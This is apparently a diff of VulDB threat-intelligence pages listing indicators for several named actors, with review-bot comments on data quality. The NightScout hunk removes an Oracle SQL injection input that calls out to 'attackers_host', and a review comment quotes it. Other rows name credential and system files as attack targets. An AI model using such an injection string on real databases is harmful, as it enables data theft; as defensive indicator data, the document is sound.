These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of Lokibot.
These indicators of compromise indicate associated network ressources which are known to be part of research and attack activities of LokiBot.

ID | IP address | Hostname | Confidence
-- | ---------- | -------- | ----------

@ -38,46 +38,75 @@ ID | IP address | Hostname | Confidence
15 | 54.225.78.40 | ec2-54-225-78-40.compute-1.amazonaws.com | Medium
16 | 54.225.165.85 | ec2-54-225-165-85.compute-1.amazonaws.com | Medium
17 | 54.225.245.108 | ec2-54-225-245-108.compute-1.amazonaws.com | Medium
18 | 54.235.88.121 | ec2-54-235-88-121.compute-1.amazonaws.com | Medium
19 | 63.141.228.141 | mxrotation8.rotationmarketingssl.com.br | High
20 | 63.250.40.204 | house-including.quarantine-pnap-vlan51.web-hosting.com | High
21 | ... | ... | ...
18 | ... | ... | ...

There are 65 more IOC items available. Please use our online service to access the data.
There are 68 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

Tactics, techniques, and procedures summarize the suspected ATT&CK techniques used by Lokibot. This data is unique as it uses our predictive model for actor profiling.
Tactics, techniques, and procedures summarize the suspected ATT&CK techniques used by LokiBot. This data is unique as it uses our predictive model for actor profiling.

ID | Technique | Description | Confidence
-- | --------- | ----------- | ----------
1 | T1059.007 | Cross Site Scripting | High
2 | T1068 | Execution with Unnecessary Privileges | High
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
4 | T1211 | 7PK Security Features | High
5 | ... | ... | ...
4 | ... | ... | ...

There are 8 more TTP items available. Please use our online service to access the data.

## IOA - Indicator of Attack

These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by Lokibot. This data is unique as it uses our predictive model for actor profiling.
These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by LokiBot. This data is unique as it uses our predictive model for actor profiling.

ID | Type | Indicator | Confidence
-- | ---- | --------- | ----------
1 | File | `%SYSTEMDRIVE%\ProgramData\exclusions.dat` | High
2 | File | `.htaccess` | Medium
3 | File | `/.htpasswd` | Medium
4 | File | `/1/?type=productinfo&S_id=140` | High
5 | File | `/?module=metadata&section=cpanel&page=list_filetypes` | High
6 | File | `/academico/aluno/esqueci-minha-senha/` | High
7 | File | `/adm/syscmd.asp` | High
8 | File | `/admin/` | Low
9 | File | `/admin/config.php?display=disa&view=form` | High
10 | File | `/admin/loginc.php` | High
11 | ... | ... | ...
1 | File | `/.htpasswd` | Medium
2 | File | `/1/?type=productinfo&S_id=140` | High
3 | File | `/academico/aluno/esqueci-minha-senha/` | High
4 | File | `/admin/config.php?display=disa&view=form` | High
5 | File | `/admin/syslog` | High
6 | File | `/api/blade-log/api/list` | High
7 | File | `/api/resource/Item?fields` | High
8 | File | `/aterm_httpif.cgi/negotiate` | High
9 | File | `/attachments.php` | High
10 | File | `/category_view.php` | High
11 | File | `/cgi-bin/wapopen` | High
12 | File | `/cms?section=manage_settings&action=edit` | High
13 | File | `/contingency/servlet/ServletFileDownload` | High
14 | File | `/data/inc/images.php` | High
15 | File | `/docs/captcha_(number).jpeg` | High
16 | File | `/etc/keystone/user-project-map.json` | High
17 | File | `/etc/sysctl.d/10-ptrace.conf` | High
18 | File | `/forum/` | Low
19 | File | `/goform/SystemCommand` | High
20 | File | `/index.php/admin/admin_manage/add.html` | High
21 | File | `/index.php/newsletter/subscriber/new/` | High
22 | File | `/knowage/restful-services/documentnotes/saveNote` | High
23 | File | `/magnoliaAuthor/.magnolia/` | High
24 | File | `/main.php` | Medium
25 | File | `/newsDia.php` | Medium
26 | File | `/objects/getSpiritsFromVideo.php` | High
27 | File | `/owa/auth/logon.aspx` | High
28 | File | `/product` | Medium
29 | File | `/reports-viewScriptReport.view` | High
30 | File | `/restapi/v1/certificates/FFM-SSLInspect` | High
31 | File | `/romfile.cfg` | Medium
32 | File | `/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet` | High
33 | File | `/system/WCore/WHelper.php` | High
34 | File | `/tmp` | Low
35 | File | `/tmp/speedtest_urls.xml` | High
36 | File | `/uncpath/` | Medium
37 | File | `/var/www/xms/cleanzip.sh` | High
38 | File | `/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php` | High
39 | File | `/webconsole/APIController` | High
40 | File | `/webconsole/Controller` | High
41 | File | `AACExtractor.cpp` | High
42 | File | `add_comment.php` | High
43 | File | `admin.htm` | Medium
44 | ... | ... | ...

There are 1133 more IOA items available. Please use our online service to access the data.
There are 384 more IOA items available. Please use our online service to access the data.

## References

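Review bot: rows 15 to 18 are all `ec2-*.compute-1.amazonaws.com` addresses, i.e. Amazon EC2 public IPs that are released and handed to other tenants when an instance stops; with only a Medium confidence and no first-seen or last-seen date beside them, they will start matching unrelated workloads, so add sighting dates or an expiry to the IOC table before consumers turn these rows into block rules. In the same hunk the IOA trailer falls from `There are 1133 more IOA items` to `There are 384 more IOA items` without a word in the commit message, and row 15 `/docs/captcha_(number).jpeg` is a pattern containing a placeholder rather than a literal path, which the Type column should reflect.
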
@ -103,4 +132,4 @@ The following articles explain our unique predictive cyber threat intelligence:

## License

(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!

@ -1,6 +1,6 @@
# Moafee - Cyber Threat Intelligence

The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Moafee](https://vuldb.com/?actor.moafee). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Moafee](https://vuldb.com/?actor.moafee). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.

Live data and more analysis capabilities are available at [https://vuldb.com/?actor.moafee](https://vuldb.com/?actor.moafee)

@ -25,11 +25,9 @@ ID | IP address | Hostname | Confidence
1 | 58.64.201.229 | - | High
2 | 98.126.91.66 | - | High
3 | 113.65.22.148 | - | High
4 | 113.65.41.28 | - | High
5 | 113.65.43.42 | - | High
6 | ... | ... | ...
4 | ... | ... | ...

There are 10 more IOC items available. Please use our online service to access the data.
There are 12 more IOC items available. Please use our online service to access the data.

## TTP - Tactics, Techniques, Procedures

@ -59,9 +57,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
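Review bot: the `?doc.` to `?kb.` rename covers every link in this hunk (cti, changelog, about, faq and the bare `?kb` documentation link) and the scip.ch article link is correctly left alone; what still needs checking across the regenerated tree is that no file kept a `?doc.` link, because the hunk at `@ -28,4 +28,4` further down shows a file whose license line already used `?kb.` before this commit, i.e. the migration was partial before. `grep -rn 'vuldb.com/?doc' .` should come back empty after this commit; the year bump to 1997-2022 is fine.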
@ -1,6 +1,6 @@
|
|||
# Monarchy - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Monarchy](https://vuldb.com/?actor.monarchy). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Monarchy](https://vuldb.com/?actor.monarchy). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.monarchy](https://vuldb.com/?actor.monarchy)
|
||||
|
||||
|
@ -16,13 +16,21 @@ These indicators of compromise indicate associated network ressources which are
|
|||
|
||||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
1 | 45.76.47.218 | - | High
|
||||
1 | 45.76.47.218 | 45.76.47.218.vultr.com | Medium
|
||||
2 | 134.122.87.198 | - | High
|
||||
3 | 178.128.163.233 | gpsurgerydatabase-staging.assura.uk | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 1 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by Monarchy. This data is unique as it uses our predictive model for actor profiling.
|
||||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `ContactSelectionActivity.java` | High
|
||||
|
||||
## References
|
||||
|
||||
The following list contains external sources which discuss the actor and the associated activities:
|
||||
|
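Review bot: row 1 gains a hostname and at the same time drops from High to Medium; since `45.76.47.218.vultr.com` is the provider's auto-generated PTR (it only repeats the address), the hostname adds no attribution and the downgrade reads as a change in the underlying assessment rather than a consequence of the lookup, so the reason should be stated. Row 3 is the opposite case: `gpsurgerydatabase-staging.assura.uk` on 178.128.163.233 names a third party's staging system, and a PTR on a rented cloud address can be stale or belong to a previous tenant, so a High rating here attaches an organisation's name to the actor on reverse-DNS evidence alone; record the resolution date or mark the hostname as unverified. Minor template wording in the same hunk: `There are 1 more IOC items` and `network ressources` in the context line.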
@ -33,9 +41,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -28,4 +28,4 @@ The following articles explain our unique predictive cyber threat intelligence:
|
|||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# MuddyWater - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [MuddyWater](https://vuldb.com/?actor.muddywater). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [MuddyWater](https://vuldb.com/?actor.muddywater). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.muddywater](https://vuldb.com/?actor.muddywater)
|
||||
|
||||
|
@ -34,13 +34,9 @@ ID | IP address | Hostname | Confidence
|
|||
4 | 38.132.99.167 | - | High
|
||||
5 | 46.99.148.96 | - | High
|
||||
6 | 66.219.22.235 | core96.hostingmadeeasy.com | High
|
||||
7 | 78.129.139.134 | der134.creditloanlenders.com | High
|
||||
8 | 78.129.139.147 | - | High
|
||||
9 | 78.129.139.148 | - | High
|
||||
10 | 78.129.222.56 | - | High
|
||||
11 | ... | ... | ...
|
||||
7 | ... | ... | ...
|
||||
|
||||
There are 18 more IOC items available. Please use our online service to access the data.
|
||||
There are 22 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
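Review bot: the cut now falls right before the 78.129.139.134/.147/.148 rows, which together with 78.129.222.56 were the one contiguous provider range in the visible table; all four now sit behind `There are 22 more`, so a reader of the markdown loses the only clustering signal while the totals are unchanged (10 + 18 and 6 + 22 both give 28). If the sample must be capped, cap it after the cluster or choose the sample so that adjacent addresses are not split across the visible/hidden boundary.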
@ -51,10 +47,9 @@ ID | Technique | Description | Confidence
|
|||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | T1211 | 7PK Security Features | High
|
||||
5 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 7 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
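Review bot: the Description column carries CWE weakness titles, not ATT&CK technique names, and this hunk makes that easy to misread: T1059.007 is "Command and Scripting Interpreter: JavaScript", T1068 is "Exploitation for Privilege Escalation" and T1110.001 is "Brute Force: Password Guessing", whereas "Cross Site Scripting", "Execution with Unnecessary Privileges" and "Improper Restriction of Excessive Authentication Attempts" are the names used for CWE-79, CWE-250 and CWE-307. Rename the column to something like `Weakness (CWE)` or add the technique name beside it, so the derivation (technique inferred from the weakness class of the vulnerabilities the actor is associated with) is visible rather than implied.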
@ -64,17 +59,30 @@ ID | Type | Indicator | Confidence
|
|||
-- | ---- | --------- | ----------
|
||||
1 | File | `%PROGRAMFILES%\MyQ\PHP\Sessions\` | High
|
||||
2 | File | `/.env` | Low
|
||||
3 | File | `/etc/ajenti/config.yml` | High
|
||||
4 | File | `/etc/passwd` | Medium
|
||||
5 | File | `/login` | Low
|
||||
6 | File | `/movie.php` | Medium
|
||||
7 | File | `/nagiosxi/admin/graphtemplates.php` | High
|
||||
8 | File | `/phppath/php` | Medium
|
||||
9 | File | `/search_events.php` | High
|
||||
10 | File | `/StartingPage/link_req_2.php` | High
|
||||
11 | ... | ... | ...
|
||||
3 | File | `/.flatpak-info` | High
|
||||
4 | File | `/etc/ajenti/config.yml` | High
|
||||
5 | File | `/etc/passwd` | Medium
|
||||
6 | File | `/login` | Low
|
||||
7 | File | `/movie.php` | Medium
|
||||
8 | File | `/nagiosxi/admin/graphtemplates.php` | High
|
||||
9 | File | `/phppath/php` | Medium
|
||||
10 | File | `/search_events.php` | High
|
||||
11 | File | `/StartingPage/link_req_2.php` | High
|
||||
12 | File | `/usr/bin/pkexec` | High
|
||||
13 | File | `/ViewUserHover.jspa` | High
|
||||
14 | File | `abook_database.php` | High
|
||||
15 | File | `admin.php` | Medium
|
||||
16 | File | `admin/admin.shtml` | High
|
||||
17 | File | `admin/AJAX_lookup_handler.php` | High
|
||||
18 | File | `admin/bitrix.xscan_worker.php` | High
|
||||
19 | File | `admin/config.php` | High
|
||||
20 | File | `admin/general.php` | High
|
||||
21 | File | `admin/login.asp` | High
|
||||
22 | File | `admin/movieedit.php` | High
|
||||
23 | File | `affich.php` | Medium
|
||||
24 | ... | ... | ...
|
||||
|
||||
There are 197 more IOA items available. Please use our online service to access the data.
|
||||
There are 196 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
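Review bot: the two new Linux rows are rated High while comparable generic paths in the same table are not: `/usr/bin/pkexec` (row 12) ships with polkit on practically every Linux desktop and `/.flatpak-info` (row 3) is present inside every Flatpak sandbox, yet `/etc/passwd` is Medium and `/login` is Low. If confidence is meant to express how specific an indicator is to this actor, these two should be scaled the same way as `/etc/passwd`; as written, a detection built from the High rows would fire on any Linux host.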
@ -92,9 +100,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -87,7 +87,7 @@ ID | Type | Indicator | Confidence
|
|||
19 | File | `ajax/api/hook/decodeArguments` | High
|
||||
20 | ... | ... | ...
|
||||
|
||||
There are 164 more IOA items available. Please use our online service to access the data.
|
||||
There are 165 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# NightScout - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [NightScout](https://vuldb.com/?actor.nightscout). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [NightScout](https://vuldb.com/?actor.nightscout). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.nightscout](https://vuldb.com/?actor.nightscout)
|
||||
|
||||
|
@ -48,12 +48,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `/+CSCOE+/logon.html` | High
|
||||
2 | File | `/cgi-bin/wapopen` | High
|
||||
3 | File | `iesfootprint.jsp` | High
|
||||
4 | File | `login_meeting.cgi` | High
|
||||
5 | Library | `ContentStore/Base/CVDataPipe.dll` | High
|
||||
6 | Argument | `FILECAMERA` | Medium
|
||||
7 | Argument | `src` | Low
|
||||
8 | Input Value | `../..` | Low
|
||||
9 | Input Value | `11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
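Review bot: trimming the visible sample to three rows drops every non-File entry (the Library row, both Argument rows and both Input Value rows), including the Oracle out-of-band injection string in old row 9 (`11' AND utl_http.request('http://attackers_host/lalal')='1' ...`), which was the only indicator on this page specific enough to turn into a detection rule. The totals match (9 visible before, 3 + 6 more after), so nothing leaves the dataset, but if the sample is capped, keep one row per Type so the Type column is not reduced to a single value.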
@ -65,9 +62,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# PakistanChatMessenger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [PakistanChatMessenger](https://vuldb.com/?actor.pakistanchatmessenger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [PakistanChatMessenger](https://vuldb.com/?actor.pakistanchatmessenger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.pakistanchatmessenger](https://vuldb.com/?actor.pakistanchatmessenger)
|
||||
|
||||
|
@ -9,6 +9,7 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac
|
|||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with PakistanChatMessenger:
|
||||
|
||||
* US
|
||||
* CN
|
||||
* DE
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
@ -50,12 +51,13 @@ ID | Type | Indicator | Confidence
|
|||
5 | File | `/list_temp_photo_pin_upload.php` | High
|
||||
6 | File | `/searchpin.php` | High
|
||||
7 | File | `/show_group_members.php` | High
|
||||
8 | File | `admin/adduser.php` | High
|
||||
9 | File | `admin\model\catalog\download.php` | High
|
||||
10 | File | `authcfg.cgi` | Medium
|
||||
11 | ... | ... | ...
|
||||
8 | File | `/sqfs/bin/sccd` | High
|
||||
9 | File | `admin/adduser.php` | High
|
||||
10 | File | `admin\model\catalog\download.php` | High
|
||||
11 | File | `authcfg.cgi` | Medium
|
||||
12 | ... | ... | ...
|
||||
|
||||
There are 91 more IOA items available. Please use our online service to access the data.
|
||||
There are 94 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
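Review bot: the inserted `/sqfs/bin/sccd` (row 8) is a path inside a squashfs root, i.e. a file on an embedded device, while its neighbours (`/searchpin.php`, `/show_group_members.php`, `authcfg.cgi`) are URL paths an attacker requests; both are typed `File`, and the context line `admin\model\catalog\download.php` adds a third flavour with backslash separators. If these rows are meant to be matched against web logs, normalise separators to `/` and split "path on the target" from "path in the request"; otherwise document that `File` means the location of the affected file in the vulnerable product.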
@ -67,9 +69,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# PittyTiger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [PittyTiger](https://vuldb.com/?actor.pittytiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [PittyTiger](https://vuldb.com/?actor.pittytiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.pittytiger](https://vuldb.com/?actor.pittytiger)
|
||||
|
||||
|
@ -29,17 +29,9 @@ ID | IP address | Hostname | Confidence
|
|||
10 | 58.61.40.5 | 5.40.61.58.broad.sz.gd.dynamic.163data.com.cn | High
|
||||
11 | 58.64.175.191 | - | High
|
||||
12 | 58.64.175.255 | - | High
|
||||
13 | 58.64.177.60 | - | High
|
||||
14 | 58.64.185.200 | - | High
|
||||
15 | 58.64.185.255 | - | High
|
||||
16 | 59.53.91.33 | - | High
|
||||
17 | 59.120.84.230 | 59-120-84-230.hinet-ip.hinet.net | High
|
||||
18 | 59.123.255.255 | 59-123-255-255.dynamic-ip.hinet.net | High
|
||||
19 | 61.145.112.78 | - | High
|
||||
20 | 61.220.44.244 | 61-220-44-244.hinet-ip.hinet.net | High
|
||||
21 | ... | ... | ...
|
||||
13 | ... | ... | ...
|
||||
|
||||
There are 40 more IOC items available. Please use our online service to access the data.
|
||||
There are 48 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
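Review bot: three of the now-hidden rows end in .255 (`58.64.175.255`, `58.64.185.255`, `59.123.255.255`), which for any /24 or larger netblock is the directed broadcast address and is unlikely to be a real host; next to `58.64.175.191`, `58.64.177.60` and `58.64.185.200` it looks as if a source reported address ranges that were flattened to their endpoints. Check the provenance before keeping them at High, and if they came from a range, store the range as reported instead of a boundary address. The hunk itself is consistent (20 + 40 and 12 + 48 both total 60).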
@ -48,6 +40,8 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us
|
|||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1499 | Resource Consumption | High
|
||||
3 | T1587.003 | Improper Certificate Validation | High
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
